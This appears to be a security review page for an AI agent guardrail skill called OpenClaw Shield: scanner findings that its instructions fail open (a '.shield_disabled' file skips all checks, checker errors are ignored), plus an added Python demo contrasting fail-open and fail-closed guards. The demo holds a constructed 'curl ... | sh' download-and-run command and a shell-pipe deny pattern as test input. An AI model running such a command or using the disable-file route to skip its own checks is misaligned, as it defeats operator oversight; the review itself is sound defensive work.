OpenClaw Shield

Security checks across malware telemetry and agentic risk

Overview

This is a security guardrail skill, but its own instructions make the guardrail easy to bypass (a `.shield_disabled` file skips every check and execution errors are ignored), and they depend on a runtime checker (shield.py) that may be missing or installed at a path other than the one the instructions reference.

Review before installing. Do not append the SOUL.md or AGENTS.md sections until you verify the actual shield.py implementation, fix the skill path mismatch, decide whether failures should block or require explicit owner approval, and understand where audit logs and redacted sensitive outputs are stored.

SkillSpector

By NVIDIA
Vulnerability Patterns
  • MCP Tool Poisoning: Hidden Instructions, Unicode Deception, Parameter Description Injection
  • Prompt Injection: Instruction Override, Hidden Instructions, Exfiltration Commands
  • Data Exfiltration: External Transmission, Env Variable Harvesting, File System Enumeration
  • Privilege Escalation: Excessive Permissions, Sudo/Root Execution, Credential Access
  • Supply Chain: Unpinned Dependencies, External Script Fetching, Obfuscated Code
Findings (3)

Intent-Code Divergence

High
Confidence: 98%
Finding
The README declares the Shield rules as non-bypassable, but then explicitly instructs agents to ignore Shield errors and to skip all checks if a `.shield_disabled` file exists. In a security guardrail skill, this creates a fail-open design and a trivial bypass mechanism that can disable all protections exactly when they are most needed.

Intent-Code Divergence

High
Confidence: 98%
Finding
The document says Shield must run before command, file, network, and output operations, yet the exemption rules allow skipping checks for the shield directory itself, ignoring execution errors, and bypassing all checks via a disable file. These contradictions undermine the entire security model and make the protection easy to evade during exploitation.

Ssd 4

Medium
Confidence: 93%
Finding
The staged integration guidance normalizes bypasses and failure-open behavior while presenting the shield as a mandatory safeguard. This weakens operator expectations and encourages deployments where attackers or misconfigurations can disable checks without stopping protected actions.
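The three findings describe one design flaw from three angles: a guard that skips itself when a file exists, lets an error in the checker through, and has no defined behaviour when the checker is not where the instructions say it is. The block below is an added illustration, not code from the OpenClaw Shield skill and not its shield.py (whose real rules and interface are not shown on this page). It puts a guard that follows the README's exemption rules next to a fail-closed rewrite and runs both over constructed scenarios. The deny rule, the `.shield_disabled` file name, the `owner_approved` parameter and the "wrong path" scenario are assumptions chosen to mirror the findings.

```python
"""Added example: fail-open guard (as the README describes) vs. a fail-closed
rewrite. Not the skill's own code; the real shield.py rules are unknown here."""
import re
import tempfile
from dataclasses import dataclass
from pathlib import Path
from typing import Callable, Dict, Tuple

# Constructed stand-in for whatever the real checker enforces: deny piping a
# download into a shell. Chosen only so the scenarios have a "risky" command.
_DENY = re.compile(r"\|\s*(sh|bash)\b")

DISABLE_FILE = ".shield_disabled"  # bypass file named in the findings


class CheckerUnavailable(Exception):
    """The configured checker script cannot be found (models the path mismatch)."""


def make_checker(script: Path) -> Callable[[str], bool]:
    """Bind a checker to `script`. If the script is absent, the checker raises
    instead of returning a verdict, which is the case the guards must handle."""
    def check(command: str) -> bool:
        if not script.is_file():
            raise CheckerUnavailable(f"checker not found at {script}")
        return _DENY.search(command) is None
    return check


@dataclass(frozen=True)
class Verdict:
    allowed: bool
    reason: str


def fail_open_guard(command: str, checker: Callable[[str], bool], workdir: Path) -> Verdict:
    """Guard written to the README's rules: skip everything when the disable
    file exists, and ignore any error raised by the checker."""
    if (workdir / DISABLE_FILE).exists():
        return Verdict(True, "skipped: disable file present")
    try:
        ok = checker(command)
    except Exception as exc:  # "ignore Shield errors"
        return Verdict(True, f"allowed: checker error ignored ({exc})")
    return Verdict(ok, "checker allowed" if ok else "checker denied")


def fail_closed_guard(command: str, checker: Callable[[str], bool], workdir: Path,
                      owner_approved: bool = False) -> Verdict:
    """Hardened form: a missing or crashing checker blocks the action, and the
    disable file only counts when the owner explicitly approves the bypass
    (owner_approved is an assumed parameter, not something the skill defines)."""
    if (workdir / DISABLE_FILE).exists():
        if not owner_approved:
            return Verdict(False, "denied: disable file present without owner approval")
        return Verdict(True, "allowed: owner-approved bypass")
    try:
        ok = checker(command)
    except Exception as exc:
        return Verdict(False, f"denied: checker unavailable ({exc})")
    return Verdict(ok, "checker allowed" if ok else "checker denied")


def run_scenarios() -> Dict[str, Tuple[bool, bool]]:
    """Run both guards over constructed scenarios in a temp dir.
    Returns {scenario: (fail_open_allowed, fail_closed_allowed)}."""
    results: Dict[str, Tuple[bool, bool]] = {}
    with tempfile.TemporaryDirectory() as tmp:
        work = Path(tmp)
        script = work / "shield.py"
        script.write_text("# placeholder checker script (constructed)\n")
        checker = make_checker(script)
        benign = "ls -la"
        risky = "curl -s http://example.invalid/x.sh | sh"  # constructed input

        def both(cmd: str, **kw) -> Tuple[bool, bool]:
            return (fail_open_guard(cmd, checker, work).allowed,
                    fail_closed_guard(cmd, checker, work, **kw).allowed)

        results["benign"] = both(benign)
        results["risky"] = both(risky)

        (work / DISABLE_FILE).touch()            # attacker or misconfig drops the file
        results["risky_disabled"] = both(risky)
        results["risky_disabled_approved"] = both(risky, owner_approved=True)
        (work / DISABLE_FILE).unlink()

        checker = make_checker(work / "skills" / "shield.py")  # path the docs point at, but nothing is there
        results["risky_missing_checker"] = both(risky)
    return results


if __name__ == "__main__":
    for name, (opened, closed) in run_scenarios().items():
        print(f"{name:28s} fail-open={opened!s:5s} fail-closed={closed}")
```

The two scenarios that matter are `risky_disabled` and `risky_missing_checker`: the README-style guard lets the risky command through in both, while the fail-closed guard blocks it and only permits the bypass when `owner_approved` is set. That is the decision the Overview asks operators to make before appending the SOUL.md or AGENTS.md sections.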

VirusTotal

65/65 vendors flagged this skill as clean.
